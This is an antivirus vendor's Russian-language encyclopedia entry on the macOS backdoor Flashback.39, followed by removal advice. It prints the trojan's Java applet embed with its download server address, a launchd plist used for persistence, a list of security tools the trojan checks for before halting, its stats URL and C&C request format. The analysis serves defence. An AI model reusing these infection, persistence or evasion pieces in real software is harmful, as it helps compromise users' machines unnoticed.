Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

BackDoor.Flashback.39

Добавлен в вирусную базу Dr.Web: 2012-03-27

Описание добавлено:

Троянская программа для MacOS X. Заражение осуществляется с использованием уязвимостей Java. Параметры для установки в систему передаются через параметры апплета, например:

<object type="application/x-java-applet" width="0" height="0">
<param name="s" value="1"/>
<param name="q" value="2"/>
<param name="svname" value="com.zeobit.keep">
<param name="svbname" value="mkeeper">
<param name="dname" value="Software Update">
<param name="lurl" value="31.31.79.87">');
<param name="archive" value="al-2.jar">
<param name="code" value="a.apl">
</object>

Эксплойт сохраняет на жесткий диск исполняемый файл и plist-файл отвечайющий за его запуск.

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.zeobit.keep</string>
<key>ProgramArguments</key><array><string>/Users/<username>/.mkeeper</string></array>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>4212</integer>
<key>StandardErrorPath</key><string>/dev/null</string>
<key>StandardOutPath</key><string>/dev/null</string>
</dict>
</plist>

После запуска троян осуществляет проверку на наличие компонент и при наличии хотябы одной из них прекращает свое выполнение:

* /Library/Little Snitch
* /Developer/Applications/Xcode.app/Contents/MacOS/Xcode
* /Applications/VirusBarrier X6.app
* /Applications/iAntiVirus/iAntiVirus.app
* /Applications/avast!.app
* /Applications/ClamXav.app
* /Applications/HTTPScoop.app
* /Applications/Packet Peeper.app

Далее отсылает сообщение об успешной установке на сервер статистики:

http://46.17.63.144/stat_svc/

Формирует список командных центров и начинает последовательный опрос соответсвующих серверов, используя GET запросы с указанием в поле user-agent следующей строки:

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:%s; id:%s) Gecko/20100101 Firefox/9.0.1

где sv: - версия бота, id: - уникальный идентификатор машины (Hardware UUID).

Получив ответ от управляющего сервера, BackDoor.Flashback.39 проверяет наличие в нем трех тегов:

##begin##
##sign##
##end##

Если проверка сообщения по подписи RSA оказывается успешной, загружает и запускает на инфицированной машине полезную нагрузку.

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке